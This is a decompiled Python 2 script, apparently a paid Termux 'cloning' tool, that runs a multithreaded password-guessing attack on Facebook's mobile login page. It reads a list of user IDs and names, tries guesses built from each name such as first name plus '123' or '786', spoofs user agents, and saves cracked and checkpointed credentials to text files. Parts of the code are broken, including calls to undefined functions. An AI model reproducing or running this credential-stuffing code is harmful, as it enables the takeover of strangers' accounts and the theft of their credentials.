# uncompyle6 version 3.7.4
# Python bytecode 2.7 (62211)
# Decompiled from: Python 2.7.18 (default, Aug  8 2021, 22:51:48) 
# [GCC 4.2.1 Compatible Android (6454773 based on r365631c2) Clang 9.0.8 (https:/
# Embedded file name: <Jutt Badshah>
# Compiled at: 2004-09-24 22:03:14
import os, time, requests, datetime, random, multiprocessing.pool, getpass, json, threading, sys, uuid, shutil, zlib, base64
from multiprocessing.pool import ThreadPool
from requests.exceptions import ConnectionError
os.system('rm -rf .txt')
for n in range(5000):
    nmbr = random.randint(1111111, 9999999)
    sys.stdout = open('.txt', 'a')
    print nmbr
    sys.stdout.flush()

l1 = '100078'
l2 = '100079'
g = '\x1b[1;92m'
r = '\x1b[1;91m'
w = '\x1b[1;97m'
y = '\x1b[1;93m'
n = '\x1b[1;94m'
gu = '\x1b[1;95m'
sm = '\x1b[1;96m'
try:
    import lolcat
except:
    os.system('pip2 install lolcat')

logo = "'\n\x1b[1;91m' ##:::'##:'##::::'##::::'###::::'##::: ##:\n'\x1b[1;92m'##::'##:: ##:::: ##:::'## ##::: ###:: ##:\n'\x1b[1;91m'##:'##::: ##:::: ##::'##:. ##:: ####: ##:\n'\x1b[1;97m'#####:::: #########:'##:::. ##: ## ## ##:\n'\x1b[1;93m'##. ##::: ##.... ##: #########: ##. ####:\n'\x1b[1;94m'##:. ##:: ##:::: ##: ##.... ##: ##:. ###:\n'\x1b[1;92m'##::. ##: ##:::: ##: ##:::: ##: ##::. ##:\n'\x1b[1;91m'..::::..::..:::::..::..:::::..::..::::..::\n\t\n'\x1b[1;92m'   Author      :     SUBHAN-XD     \n'\x1b[1;91m'   Github      :     SubhanXKhan  \n'\x1b[1;96m'   FB ID       :     Subhan Khan\n'\x1b[1;93m'   TOOL TYPE   :     PAID COMMANDS\n'\x1b[1;91m'   WAP NUMBER  :     03189339494            \n"
dec = '2'
server = '2'
rsauser = 'Mozilla/5.0 (Linux; Android 10; Mi 9T Pro Build/QKQ1.190825.002; wv) AppleWebKit/537.36 (KHTML, like Gecko) Version/4.0 Chrome/88.0.4324.181 Mobile Safari/537.36 [FBAN/EMA;FBLC/id_ID;FBAV/239.0.0.10.109;]'
header = {'x-fb-connection-bandwidth': str(random.randint(20000000.0, 30000000.0)), 'x-fb-sim-hni': str(random.randint(20000, 40000)), 'x-fb-net-hni': str(random.randint(20000, 40000)), 'x-fb-connection-quality': 'EXCELLENT', 'x-fb-connection-type': 'cell.CTRadioAccessTechnologyHSDPA', 'user-agent': rsauser, 'content-type': 'application/x-www-form-urlencoded', 'x-fb-http-engine': 'Liger'}
reload(sys)
sys.setdefaultencoding('utf8')
fuck = []
idx = []
oks = []
cps = []

def main_apv():
    imt = '+SUBHAN=='
    os.system('clear')
    print logo
    try:
        key1 = open('/sdcard/imt.txt', 'r').read()
    except IOError:
        os.system('clear')
        print logo
        print '           You dont have subscrption'
        print '           Hello Dear Ya Cammonds Paid Han Or'
        print '           Ap Ke Subscription Nhi Ha Please Ap'
        print '           Admin Sa Rabta Kran Thanks'
        print '           Subscription Kelya Enter Press Kro'
        print '           Or Whatsapp Pa Rabta Kro Thanks'
        print ''
        myid = uuid.uuid4().hex[:10]
        print '         YOUR KEY : ' + myid + imt
        kok = open('/sdcard/imt.txt', 'w')
        kok.write(myid + imt)
        kok.close()
        print ''
        print '           Ya Uper Wale Ap Ke KEY Ha'
        print '           Copy Kar Ka WhatsApp Pa Bhaj Dena'
        print ''
        print ''
        print ''
        print '             Agar Ap Na Subscription Kar Le Ha To'
        raw_input('  Termux Sa Exit Kar Ka Phir Sa Cammonds Lagio Thanks')
        os.system('xdg-open https://wa.me/+923189339494')

    r1 = requests.get('https://raw.githubusercontent.com/SubhanXKhan/KHAN-XD/main/server.txt').text
    if key1 in r1:
        main_system()
    else:
        os.system('clear')
        print logo
        print '           You dont have subscrption'
        print '           Hello Dear Ya Cammonds Paid Han Or'
        print '           Ap Ke Subscription Nhi Ha Please Ap'
        print '           Admin Sa Rabta Kran Thanks'
        print '           Subscription Kelya Enter Press Kro'
        print '           Or Whatsapp Pa Rabta Kro Thanks'
        print ''
        print '         YOUR KEY : ' + key1
        print ''
        print '           Ya Uper Wale Ap Ke KEY Ha'
        print '           Copy Kar Ka WhatsApp Pa Bhaj Dena'
        print ''
        print ''
        print ''
        print '             Agar Ap Na Subscription Kar Le Ha To'
        raw_input('  Termux Sa Exit Kar Ka Phir Sa Cammonds Lagio Thanks')
        os.system('xdg-open https://wa.me/+923189339494')


def Javed():
    try:
        token = open('token.txt', 'r').read()
    except:
        pass

    try:
        r = requests.get('https://graph.facebook.com/me?access_token=' + token)
        q = json.loads(r.text)
        m = q['name']
        print ''
    except requests.exceptions.ConnectionError:
        print logo
        print ''
        print 'Trun On Data An Then \t'
        print ''
    except:
        print '\x1b[1;91mToken on Chekpiont '
        os.system('rm -rf token.txt')

    os.system('clear')
    print logo
    print ''
    print 39 * '~'
    print '\x1b[1;93m[1]   Public Cloning      \x1b[1;92m(Login)'
    print '\x1b[1;91m[2]   Random Cloning     \x1b[1;92m (No Login)'
    print '\x1b[1;92m[3]   File Cloning       \x1b[1;92m (No Login)'
    print '\x1b[1;93m[4]   File Making Menu\x1b[1;92m    (Login)'
    print '\x1b[1;94m[5]   Check Subscription '
    print '\x1b[1;95m[6]   Update Tools'
    print '\x1b[1;96m[7]   For Any Help Massage WhatsApp'
    print 43 * '~'
    print '\x1b[1;92m[*] \x1b[1;95m For Need Any Help Type 7 And Massage Me On \x1b[1;92mWhatsApp '
    print 43 * '~'
    main_input()


def main_input():
    mx = raw_input('\x1b[1;92m[!] Select : ')
    if mx == '1':
        print ''
        print '\x1b[1;94m Cheking Subscription ....\x1b[1;92m'
        time.sleep(3)
        fileauto()
    elif mx == '2':
        print ''
        print '\x1b[1;94m Cheking Subscription ....\x1b[1;97m'
        time.sleep(3)
        numcloning()
    elif mx == '3':
        print ''
        os.system('clear')
        
    elif mx == '2':
        context()
        os.system('xdg-open https://wa.me/+923189339494')
        time.sleep(3)
        main_system()
    else:
        print 'invild option'
        time.sleep(2)
        main_system()




def fileauto():
    os.system('clear')
    print logo
    print ''
    print ''
    try:
        mf = raw_input('[!] Enter path : ')
        print ''
        for line in open(mf, 'r').readlines():
            idx.append(line.strip())

    except:
        print 'file not found'
        time.sleep(2)
       

    print '[!] total ids : ' + str(len(idx))
    os.system('echo " -----------------------------------"| lolcat')
    print '    Cracking Start Please Wait ..'
    print '    Use Flight Mod For For Speed Up'
    os.system('echo " -----------------------------------"| lolcat')

    def main(arg):
        user = arg
        uid, name = user.split('|')
        name = name.lower()
        first = name.rsplit(' ')[0]
        try:
            last = name.rsplit(' ')[1]
        except:
            pass

        lines = random.choice([
         'Dalvik/1.6.0 (Linux; U; Android 4.4.2; NX55 Build/KOT5506) [FBAN/FB4A;FBAV/106.0.0.26.68;FBBV/45904160;FBDM/{density=3.0,width=1080,height=1920};FBLC/it_IT;FBRV/45904160;FBCR/PosteMobile;FBMF/asus;FBBD/asus;FBPN/com.facebook.katana;FBDV/ASUS_Z007;FBSV/5.0;FBOP/1;FBCA/x86:armeabi-v7a;]',
         'Mozilla/5.0 (Linux; Android 10; Mi 9T Pro Build/QKQ1.190825.002; wv) AppleWebKit/537.36 (KHTML, like Gecko) Version/4.0 Chrome/88.0.4324.181 Mobile Safari/537.36 [FBAN/EMA;FBLC/id_ID;FBAV/239.0.0.10.109;]',
         'Mozilla/5.0 (Linux; Android 11; SM-M307FN) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.45 Mobile Safari/537.36',
         'Mozilla/5.0 (Linux; Android 10; Mi 9T Pro Build/QKQ1.190825.002; wv) AppleWebKit/537.36 (KHTML, like Gecko) Version/4.0 Chrome/88.0.4324.181 Mobile Safari/537.36[FBAN/EMA;FBLC/it_IT;FBAV/239.0.0.10.109;]'])
        try:
            pass1 = name
            rana = requests.Session()
            rana.headers.update({'Host': 'mbasic.facebook.com', 'cache-control': 'max-age=0', 'upgrade-insecure-requests': '1', 'user-agent': lines, 'accept': 'text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,image/apng,*/*;q=0.8', 'accept-encoding': 'gzip, deflate', 'upgrade-insecure-requests': str(random.randint(100, 200)), 'accept-language': 'id-ID,id;q=0.9,en-US;q=0.8,en;q=0.7'})
            p = rana.get('https://mbasic.facebook.com')
            b = rana.post('https://mbasic.facebook.com/login.php', data={'email': uid, 'pass': pass1, 'login': 'submit'})
            if 'c_user' in rana.cookies.get_dict().keys():
                print '\x1b[1;92m[SUBHAN-OK] ' + uid + ' | ' + pass1
                ok = open('SUBHAN-ok.txt', 'a')
                ok.write(uid + ' | ' + pass1 + '\n')
                ok.close()
                oks.append(uid + pass1)
            elif 'checkpoint' in rana.cookies.get_dict().keys():
                print '\x1b[1;97m[SUBHAN-CP] ' + uid + ' | ' + pass1
                cp = open('SUBHAN-cp.txt', 'a')
                cp.write(uid + ' | ' + pass1 + '\n')
                cp.close()
                cps.append(uid + pass1)
            else:
                pass2 = first + '123'
                rana = requests.Session()
                rana.headers.update({'Host': 'mbasic.facebook.com', 'cache-control': 'max-age=0', 'upgrade-insecure-requests': '1', 'user-agent': lines, 'accept': 'text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,image/apng,*/*;q=0.8', 'accept-encoding': 'gzip, deflate', 'upgrade-insecure-requests': str(random.randint(100, 200)), 'accept-language': 'id-ID,id;q=0.9,en-US;q=0.8,en;q=0.7'})
                p = rana.get('https://mbasic.facebook.com')
                b = rana.post('https://mbasic.facebook.com/login.php', data={'email': uid, 'pass': pass2, 'login': 'submit'})
                if 'c_user' in rana.cookies.get_dict().keys():
                    print '\x1b[1;92m[SUBHAN-OK] ' + uid + ' | ' + pass2
                    ok = open('SUBHAN-ok.txt', 'a')
                    ok.write(uid + ' | ' + pass2 + '\n')
                    ok.close()
                    oks.append(uid + pass2)
                elif 'checkpoint' in rana.cookies.get_dict().keys():
                    print '\x1b[1;97m[SUBHAN-CP] ' + uid + ' | ' + pass2
                    cp = open('SUBHAN-cp.txt', 'a')
                    cp.write(uid + ' | ' + pass2 + '\n')
                    cp.close()
                    cps.append(uid + pass2)
                else:
                    pass3 = first + 'last'
                    rana = requests.Session()
                    rana.headers.update({'Host': 'mbasic.facebook.com', 'cache-control': 'max-age=0', 'upgrade-insecure-requests': '1', 'user-agent': lines, 'accept': 'text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,image/apng,*/*;q=0.8', 'accept-encoding': 'gzip, deflate', 'upgrade-insecure-requests': str(random.randint(100, 200)), 'accept-language': 'id-ID,id;q=0.9,en-US;q=0.8,en;q=0.7'})
                    p = rana.get('https://mbasic.facebook.com')
                    b = rana.post('https://mbasic.facebook.com/login.php', data={'email': uid, 'pass': pass3, 'login': 'submit'})
                    if 'c_user' in rana.cookies.get_dict().keys():
                        print '\x1b[1;92m[SUBHAN-OK] ' + uid + ' | ' + pass3
                        ok = open('SUBHAN-ok.txt', 'a')
                        ok.write(uid + ' | ' + pass3 + '\n')
                        ok.close()
                        oks.append(uid + pass3)
                    elif 'checkpoint' in rana.cookies.get_dict().keys():
                        print '\x1b[1;97m[SUBHAN-CP] ' + uid + ' | ' + pass3
                        cp = open('SUBHAN-cp.txt', 'a')
                        cp.write(uid + ' | ' + pass3 + '\n')
                        cp.close()
                        cps.append(uid + pass3)
                    else:
                        pass4 = first + '12345'
                        rana = requests.Session()
                        rana.headers.update({'Host': 'mbasic.facebook.com', 'cache-control': 'max-age=0', 'upgrade-insecure-requests': '1', 'user-agent': lines, 'accept': 'text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,image/apng,*/*;q=0.8', 'accept-encoding': 'gzip, deflate', 'upgrade-insecure-requests': str(random.randint(100, 200)), 'accept-language': 'id-ID,id;q=0.9,en-US;q=0.8,en;q=0.7'})
                        p = rana.get('https://mbasic.facebook.com')
                        b = rana.post('https://mbasic.facebook.com/login.php', data={'email': uid, 'pass': pass4, 'login': 'submit'})
                        if 'c_user' in rana.cookies.get_dict().keys():
                            print '\x1b[1;92m[SUBHAN-OK] ' + uid + ' | ' + pass4
                            ok = open('SUBHAN-ok.txt', 'a')
                            ok.write(uid + ' | ' + pass4 + '\n')
                            ok.close()
                            oks.append(uid + pass4)
                        elif 'checkpoint' in rana.cookies.get_dict().keys():
                            print '\x1b[1;97m[SUBHAN-CP] ' + uid + ' | ' + pass4
                            cp = open('SUBHAN-cp.txt', 'a')
                            cp.write(uid + ' | ' + pass4 + '\n')
                            cp.close()
                            cps.append(uid + pass4)
                        else:
                            pass5 = first + '786'
                            rana = requests.Session()
                            rana.headers.update({'Host': 'mbasic.facebook.com', 'cache-control': 'max-age=0', 'upgrade-insecure-requests': '1', 'user-agent': lines, 'accept': 'text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,image/apng,*/*;q=0.8', 'accept-encoding': 'gzip, deflate', 'upgrade-insecure-requests': str(random.randint(100, 200)), 'accept-language': 'id-ID,id;q=0.9,en-US;q=0.8,en;q=0.7'})
                            p = rana.get('https://mbasic.facebook.com')
                            b = rana.post('https://mbasic.facebook.com/login.php', data={'email': uid, 'pass': pass5, 'login': 'submit'})
                            if 'c_user' in rana.cookies.get_dict().keys():
                                print '\x1b[1;92m[SUBHAN-OK] ' + uid + ' | ' + pass5
                                ok = open('SUBHAN-ok.txt', 'a')
                                ok.write(uid + ' | ' + pass5 + '\n')
                                ok.close()
                                oks.append(uid + pass5)
                            elif 'checkpoint' in rana.cookies.get_dict().keys():
                                print '\x1b[1;97m[SUBHAN-CP] ' + uid + ' | ' + pass5
                                cp = open('SUBHAN-cp.txt', 'a')
                                cp.write(uid + ' | ' + pass5 + '\n')
                                cp.close()
                                cps.append(uid + pass5)
        except:
            pass

    p = ThreadPool(30)
    p.map(main, idx)
    print '\x1b[1;97m'
    print 39 * '-'
    print '[!] cloning complete result ........'
    print 39 * '-'
    print '[!] total ok ids : ' + str(len(oks))
    print '[!] total cp ids : ' + str(len(cps))
    print 39 * '-'
    print ''
    raw_input(' Press enter to back ')
    main_system()



if __name__ == '__main__':
    Javed()
# okay decompiling 77.pyc
